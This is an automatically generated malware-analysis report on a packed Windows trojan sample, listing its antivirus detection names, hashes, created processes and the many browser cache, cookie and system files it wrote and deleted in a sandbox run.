Gen.Variant.Graftor.311431_6d4509907f

by malwarelabrobot on January 4th, 2017 in Malware Descriptions.

Gen:Variant.Graftor.311431 (BitDefender), Trojan.Win32.Generic!BT (VIPRE), Trojan.Click3.23060 (DrWeb), Gen:Variant.Graftor.311431 (B) (Emsisoft), GenericRXAR-PT!395CF8C931BB (McAfee), Trojan.Gen (Symantec), Virus.Win32.Delf (Ikarus), Gen:Variant.Graftor.311431 (FSecure), Win32/DH{JDWBDgOCHA?} (AVG), MSIL:Kryptik-AQ [Trj] (Avast), TROJ_GEN.R03EC0RLK16 (TrendMicro), Gen:Variant.Graftor.311431 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6d4509907f6984392fadff6d4d29afe6
SHA1: 6abaae0b0c8f9867a914048735956d4ea285071e
SHA256: 57e82a7fe1331c7693f17fc09cb458d460c96cef27ee875e615c5c5676ea91cd
SSDeep: 24576:OKfftVr7dl8XJcu K6lBKdqvuNLU6FwHvByw1j 2pW6:1ftVNl8XJcVhlgoulCHp11j9W
Size: 1040976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company:
Created at: 2012-09-09 19:22:17
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2472
6d4509907f6984392fadff64d29afe6.exe:1744

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (7962 bytes)
C:\Windows\kDLxTQ.dll (11 bytes)

The Trojan deletes the following file(s):

C:\Windows\kDLxTQ.dll (0 bytes)

The process 6d4509907f6984392fadff64d29afe6.exe:1744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Windows\FuYQjy\WPHvFGSUV.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\FuYQjy\NRYLflMJ.dll (264 bytes)
C:\Windows\OMTjoPCF.dll (13 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\FuYQjy\4BFD7.dat (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\Windows\System32\2036c9\CDClient_EX.sys (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\FuYQjy\gbilEk.dll (15753 bytes)
C:\Windows\3.txt (1480 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Windows\FuYQjy\WPHvFGSUV.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Windows\FuYQjy\NRYLflMJ.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ioyIAh\6d4509907f6984392fadff64d29afe6.exe (0 bytes)
C:\Windows\FuYQjy\gbilEk.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Windows\OMTjoPCF.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Windows\FuYQjy\4BFD7.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Windows\System32\2036c9\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
